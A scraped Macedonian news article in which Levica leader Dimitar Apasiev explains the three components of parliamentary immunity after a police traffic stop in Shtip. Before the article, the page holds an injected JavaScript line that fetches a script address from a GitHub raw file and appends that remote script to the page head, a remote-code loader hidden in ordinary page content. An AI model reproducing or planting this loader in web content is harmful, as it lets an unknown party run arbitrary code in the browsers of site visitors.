;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); (Видео) Апасиев: Пратеничкиот имунитет е во суштина антиполициски - Антропол
АктуелноЛокално

(Видео) Апасиев: Пратеничкиот имунитет е во суштина антиполициски


Пратеникот и претседател на Левица, проф. д-р Димитар Апасиев, во емисијата „Само вистина“, правно го објасни пратеничкиот имунитет и случајот со непрофесионалното постапување на полицаецот од Штип, кој направи најмалку четири службени прекршоци при контрола во сообраќајот, откако го сопре возилото на Апасиев.

Пратеничкиот имунитет има три компоненти. Првиот се вика индемнитет или материјално правен, не можат да те уапсат а говор или гласање во собранието. Потекнува од XIV век од Англија кога кралот со неговата тајна полиција и агентите ги апсел опозициските пратеници кои го критикувале, како напад врз круната го сметал за велепредавство и ги чистел. За да не се деша такво чистење на опозицијата е воведен токму овој индемнитет.

Второто е екстеториталиет или формално правен имунитет. Тоа е неможност да бидете лишен од слобода, задржан, притворен или уапсен од страна на полиција, потекнува исто така од Англија.

Третиот е телесен интегритет, односно личност на неповредливост. Тоа е придобивка на француска револуција, и е неможност за преглед, претрес и неможност на служење војска.

Тие три компоненти се недопирливи за пратениците, изјави пратеникот и претседател на Левица, проф. д-р Димитар Апасиев, во емисијата „Само вистина“